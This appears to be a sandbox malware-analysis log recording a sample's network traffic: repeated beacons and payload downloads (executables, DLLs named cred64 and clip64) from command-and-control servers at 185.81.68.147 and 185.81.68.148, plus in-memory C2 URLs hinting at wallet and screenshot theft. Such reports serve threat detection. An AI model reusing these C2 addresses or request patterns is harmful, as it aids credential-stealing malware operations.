                              Source: global trafficHTTP traffic detected: POST /VzCAHn.php?1DC30FADAFF92643095942 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
                              Source: global trafficHTTP traffic detected: POST /VzCAHn.php?1DC30FADAFF92643095942 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
                              Source: global trafficHTTP traffic detected: POST /VzCAHn.php?1DC30FADAFF92643095942 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
                              Source: global trafficHTTP traffic detected: POST /VzCAHn.php?1DC30FADAFF92643095942 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
                              Source: global trafficHTTP traffic detected: POST /VzCAHn.php?1DC30FADAFF92643095942 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
                              Source: global trafficHTTP traffic detected: POST /VzCAHn.php?1DC30FADAFF92643095942 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
                              Source: global trafficHTTP traffic detected: POST /VzCAHn.php?1DC30FADAFF92643095942 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
                              Source: global trafficHTTP traffic detected: POST /VzCAHn.php?1DC30FADAFF92643095942 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
                              Source: global trafficHTTP traffic detected: POST /VzCAHn.php?1DC30FADAFF92643095942 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
                              Source: global trafficHTTP traffic detected: POST /VzCAHn.php?1DC30FADAFF92643095942 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
                              Source: global trafficHTTP traffic detected: POST /VzCAHn.php?1DC30FADAFF92643095942 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
                              Source: global trafficHTTP traffic detected: POST /VzCAHn.php?1DC30FADAFF92643095942 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
                              Source: global trafficHTTP traffic detected: POST /VzCAHn.php?1DC30FADAFF92643095942 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
                              Source: global trafficHTTP traffic detected: POST /VzCAHn.php?1DC30FADAFF92643095942 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
                              Source: global trafficHTTP traffic detected: POST /VzCAHn.php?1DC30FADAFF92643095942 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
                              Source: global trafficHTTP traffic detected: POST /VzCAHn.php?1DC30FADAFF92643095942 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
                              Source: global trafficHTTP traffic detected: POST /VzCAHn.php?1DC30FADAFF92643095942 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
                              Source: global trafficHTTP traffic detected: POST /VzCAHn.php?1DC30FADAFF92643095942 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
                              Source: global trafficHTTP traffic detected: POST /VzCAHn.php?1DC30FADAFF92643095942 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
                              Source: global trafficHTTP traffic detected: POST /VzCAHn.php?1DC30FADAFF92643095942 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
                              Source: global trafficHTTP traffic detected: POST /VzCAHn.php?1DC30FADAFF92643095942 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                              Source: C:\Users\user\Desktop\yINR7uQlPr.exeCode function: 0_2_00007FF79E381CDC InternetOpenW,Sleep,InternetOpenUrlW,InternetOpenUrlW,InternetCloseHandle,Sleep,HttpQueryInfoA,InternetCloseHandle,InternetCloseHandle,Sleep,InternetCloseHandle,InternetOpenUrlW,InternetCloseHandle,Sleep,HttpQueryInfoA,GetProcessHeap,RtlAllocateHeap,InternetCloseHandle,InternetCloseHandle,InternetReadFile,InternetCloseHandle,InternetCloseHandle,0_2_00007FF79E381CDC
                              Source: global trafficHTTP traffic detected: GET /ctx.exe HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                              Source: global trafficHTTP traffic detected: GET /ssg.exe HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                              Source: global trafficHTTP traffic detected: GET /update.exe HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                              Source: global trafficHTTP traffic detected: GET /gfx.exe HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                              Source: global trafficHTTP traffic detected: GET /7vhfjke3/Plugins/cred64.dll HTTP/1.1Host: 185.81.68.147
                              Source: global trafficHTTP traffic detected: GET /7vhfjke3/Plugins/clip64.dll HTTP/1.1Host: 185.81.68.147
                              Source: global trafficHTTP traffic detected: GET /update.exe HTTP/1.1Host: 185.81.68.147
                              Source: global trafficHTTP traffic detected: GET /update.exe HTTP/1.1Host: 185.81.68.147If-Modified-Since: Thu, 12 Dec 2024 05:53:20 GMTIf-None-Match: "4b400-6290c54e671ba"
                              Source: global trafficHTTP traffic detected: GET /ssg.exe HTTP/1.1Host: 185.81.68.147
                              Source: unknownHTTP traffic detected: POST /VzCAHn.php?1DC30FADAFF92643095942 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                              Source: Gxtuum.exe, 00000014.00000002.3380715534.0000000000DAD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.81.68.147/7vhfjke3/Plugins/clip64.dll
                              Source: Gxtuum.exe, 00000014.00000002.3380715534.0000000000DAD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.81.68.147/7vhfjke3/Plugins/clip64.dllb
                              Source: Gxtuum.exe, 00000014.00000002.3380715534.0000000000D60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.81.68.147/7vhfjke3/Plugins/cred64.dll
                              Source: Gxtuum.exe, 00000014.00000002.3380715534.0000000000D60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.81.68.147/7vhfjke3/Plugins/cred64.dll$
                              Source: Gxtuum.exe, 00000014.00000002.3380715534.0000000000E00000.00000004.00000020.00020000.00000000.sdmp, Gxtuum.exe, 00000014.00000002.3380715534.0000000000D17000.00000004.00000020.00020000.00000000.sdmp, Gxtuum.exe, 00000014.00000002.3380715534.0000000000D60000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000016.00000002.2679991024.000001ED567B7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001D.00000002.3377277785.000000000328F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001E.00000002.3378440733.0000000003410000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001E.00000002.3378440733.00000000033DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.81.68.147/7vhfjke3/index.php
                              Source: rundll32.exe, 0000001E.00000002.3378440733.00000000033DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.81.68.147/7vhfjke3/index.php#
                              Source: Gxtuum.exe, 00000014.00000002.3380715534.0000000000E00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.81.68.147/7vhfjke3/index.php$
                              Source: Gxtuum.exe, 00000014.00000002.3380715534.0000000000E00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.81.68.147/7vhfjke3/index.php.0
                              Source: Gxtuum.exe, 00000014.00000002.3380715534.0000000000E00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.81.68.147/7vhfjke3/index.php0000840101
                              Source: Gxtuum.exe, 00000014.00000002.3380715534.0000000000E00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.81.68.147/7vhfjke3/index.php30
                              Source: rundll32.exe, 00000018.00000002.2689505871.000001C0C6BDA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.81.68.147/7vhfjke3/index.php6
                              Source: rundll32.exe, 00000018.00000002.2689505871.000001C0C6BDA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.81.68.147/7vhfjke3/index.php8
                              Source: Gxtuum.exe, 00000014.00000002.3380715534.0000000000E00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.81.68.147/7vhfjke3/index.php830101
                              Source: Gxtuum.exe, 00000014.00000002.3380715534.0000000000E00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.81.68.147/7vhfjke3/index.php95
                              Source: rundll32.exe, 0000001D.00000002.3377277785.00000000032C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.81.68.147/7vhfjke3/index.php:
                              Source: Gxtuum.exe, 00000014.00000002.3380715534.0000000000E00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.81.68.147/7vhfjke3/index.php?(
                              Source: Gxtuum.exe, 00000014.00000002.3380715534.0000000000E00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.81.68.147/7vhfjke3/index.php?)
                              Source: Gxtuum.exe, 00000014.00000002.3380715534.0000000000DAD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.81.68.147/7vhfjke3/index.php?scr=1
                              Source: Gxtuum.exe, 00000014.00000002.3380715534.0000000000DAD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.81.68.147/7vhfjke3/index.php?scr=1eC
                              Source: rundll32.exe, 00000018.00000002.2689505871.000001C0C6C0D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000018.00000002.2689505871.000001C0C6B48000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000018.00000002.2689505871.000001C0C6BDA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.81.68.147/7vhfjke3/index.php?wal=1
                              Source: rundll32.exe, 00000016.00000002.2680605134.000001ED586C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.81.68.147/7vhfjke3/index.php?wal=11
                              Source: rundll32.exe, 00000018.00000002.2689505871.000001C0C6BDA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.81.68.147/7vhfjke3/index.php?wal=1Files
                              Source: rundll32.exe, 0000001D.00000002.3377277785.00000000032C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.81.68.147/7vhfjke3/index.phpA
                              Source: rundll32.exe, 0000001E.00000002.3378440733.0000000003410000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.81.68.147/7vhfjke3/index.phpE
                              Source: Gxtuum.exe, 00000014.00000002.3380715534.0000000000E00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.81.68.147/7vhfjke3/index.phpE7
                              Source: Gxtuum.exe, 00000014.00000002.3380715534.0000000000E00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.81.68.147/7vhfjke3/index.phpJ7
                              Source: rundll32.exe, 0000001E.00000002.3378440733.0000000003410000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.81.68.147/7vhfjke3/index.phpK
                              Source: Gxtuum.exe, 00000014.00000002.3380715534.0000000000E00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.81.68.147/7vhfjke3/index.phpR0
                              Source: rundll32.exe, 00000016.00000002.2679991024.000001ED567B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.81.68.147/7vhfjke3/index.phpU
                              Source: Gxtuum.exe, 00000014.00000002.3380715534.0000000000E00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.81.68.147/7vhfjke3/index.php_(
                              Source: Gxtuum.exe, 00000014.00000002.3380715534.0000000000E00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.81.68.147/7vhfjke3/index.phpi7
                              Source: Gxtuum.exe, 00000014.00000002.3380715534.0000000000E00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.81.68.147/7vhfjke3/index.phpl0
                              Source: Gxtuum.exe, 00000014.00000002.3380715534.0000000000E00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.81.68.147/7vhfjke3/index.phpo/
                              Source: Gxtuum.exe, 00000014.00000002.3380715534.0000000000E00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.81.68.147/7vhfjke3/index.phpq0
                              Source: Gxtuum.exe, 00000014.00000002.3380715534.0000000000DAD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.81.68.147/ssg.exe
                              Source: Gxtuum.exe, 00000014.00000002.3380715534.0000000000DAD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.81.68.147/ssg.exe6J
                              Source: Gxtuum.exe, 00000014.00000002.3380715534.0000000000DAD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.81.68.147/update.exe
                              Source: Gxtuum.exe, 00000014.00000002.3380715534.0000000000DAD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.81.68.147/update.exe/J
                              Source: Gxtuum.exe, 00000014.00000002.3380715534.0000000000DAD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.81.68.147/update.exeDJ%
                              Source: rundll32.exe, 00000016.00000002.2680605134.000001ED586C0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000018.00000002.2689505871.000001C0C6BDA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001E.00000002.3378440733.0000000003410000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.81.68.148/
                              Source: Gxtuum.exe, 00000014.00000002.3380715534.0000000000D60000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000016.00000002.2679991024.000001ED567B7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000018.00000002.2689505871.000001C0C6B48000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001D.00000002.3377277785.000000000328F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001E.00000002.3378440733.00000000033DF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001E.00000002.3378440733.0000000003427000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.81.68.148/8Fvu5jh4DbS/index.php
                              Source: rundll32.exe, 00000016.00000002.2679991024.000001ED567B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.81.68.148/8Fvu5jh4DbS/index.php)
                              Source: Gxtuum.exe, 00000014.00000002.3380715534.0000000000D84000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.81.68.148/8Fvu5jh4DbS/index.php101
                              Source: Gxtuum.exe, 00000014.00000002.3380715534.0000000000DAD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.81.68.148/8Fvu5jh4DbS/index.php2
                              Source: rundll32.exe, 0000001D.00000002.3377277785.000000000328F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.81.68.148/8Fvu5jh4DbS/index.php6
                              Source: Gxtuum.exe, 00000014.00000002.3380715534.0000000000E00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.81.68.148/8Fvu5jh4DbS/index.php:
                              Source: Gxtuum.exe, 00000014.00000002.3380715534.0000000000DAD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.81.68.148/8Fvu5jh4DbS/index.php?scr=1
                              Source: rundll32.exe, 00000018.00000002.2689505871.000001C0C6BDA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.81.68.148/8Fvu5jh4DbS/index.php?wal=1
                              Source: rundll32.exe, 00000018.00000002.2689505871.000001C0C6BDA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.81.68.148/8Fvu5jh4DbS/index.php?wal=1PR
                              Source: rundll32.exe, 00000016.00000002.2680605134.000001ED586C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.81.68.148/8Fvu5jh4DbS/index.php?wal=1Q
                              Source: rundll32.exe, 00000016.00000002.2680605134.000001ED586C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.81.68.148/8Fvu5jh4DbS/index.php?wal=1g
                              Source: rundll32.exe, 00000018.00000002.2689505871.000001C0C6BDA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.81.68.148/8Fvu5jh4DbS/index.php?wal=1r
                              Source: rundll32.exe, 00000016.00000002.2680605134.000001ED586C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.81.68.148/8Fvu5jh4DbS/index.php?wal=1rns
                              Source: rundll32.exe, 00000018.00000002.2689505871.000001C0C6BBE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.81.68.148/8Fvu5jh4DbS/index.php?wal=1ws
                              Source: rundll32.exe, 0000001E.00000002.3378440733.00000000033DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.81.68.148/8Fvu5jh4DbS/index.phpB/
                              Source: Gxtuum.exe, 00000014.00000002.3380715534.0000000000D84000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.81.68.148/8Fvu5jh4DbS/index.phpUsers
                              Source: Gxtuum.exe, 00000014.00000002.3380715534.0000000000D84000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.81.68.148/8Fvu5jh4DbS/index.phpX
                              Source: Gxtuum.exe, 00000014.00000002.3384934362.0000000003AC3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.81.68.148/8Fvu5jh4DbS/index.phpa
                              Source: Gxtuum.exe, 00000014.00000002.3380715534.0000000000E00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.81.68.148/8Fvu5jh4DbS/index.phpd
                              Source: Gxtuum.exe, 00000014.00000002.3380715534.0000000000E00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.81.68.148/8Fvu5jh4DbS/index.phpded
                              Source: Gxtuum.exe, 00000014.00000002.3380715534.0000000000D84000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.81.68.148/8Fvu5jh4DbS/index.phpindows
                              Source: Gxtuum.exe, 00000014.00000002.3380715534.0000000000D84000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.81.68.148/8Fvu5jh4DbS/index.phpll32.dll
                              Source: Gxtuum.exe, 00000014.00000002.3380715534.0000000000E00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.81.68.148/8Fvu5jh4DbS/index.phpmb3JtLXVybGVuY29kZWQ=ex.php~7
                              Source: Gxtuum.exe, 00000014.00000002.3380715534.0000000000E00000.00000004.00000020.00020000.00000000.sdmp, Gxtuum.exe, 00000014.00000002.3380715534.0000000000D60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.81.68.148/8Fvu5jh4DbS/index.phpoded
                              Source: Gxtuum.exe, 00000014.00000002.3380715534.0000000000E00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.81.68.148/8Fvu5jh4DbS/index.phpodedu
                              Source: rundll32.exe, 0000001E.00000002.3378440733.0000000003427000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.81.68.148/8Fvu5jh4DbS/index.phpsKj
                              Source: Gxtuum.exe, 00000014.00000002.3384934362.0000000003AC3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.81.68.148/8Fvu5jh4DbS/index.phpt
                              Source: rundll32.exe, 00000018.00000002.2689505871.000001C0C6B48000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.81.68.148/8Fvu5jh4DbS/index.phpu
                              Source: Gxtuum.exe, 00000014.00000002.3384934362.0000000003AC3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.81.68.148/8Fvu5jh4DbS/index.phpx
                              Source: rundll32.exe, 0000001D.00000002.3377277785.000000000328F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001E.00000002.3378440733.00000000033DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.81.68.148/Fvu5jh4DbS/index.php
                              Source: rundll32.exe, 0000001E.00000002.3378440733.0000000003410000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.81.68.148/Gyy7jBw4C3efUKzCqRmC8sK1bRhSyTkkD9QYQDw4TYWGHLCsdncEYUAcfHsMuh5M
                              Source: rundll32.exe, 00000016.00000002.2680605134.000001ED586C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.81.68.148/a
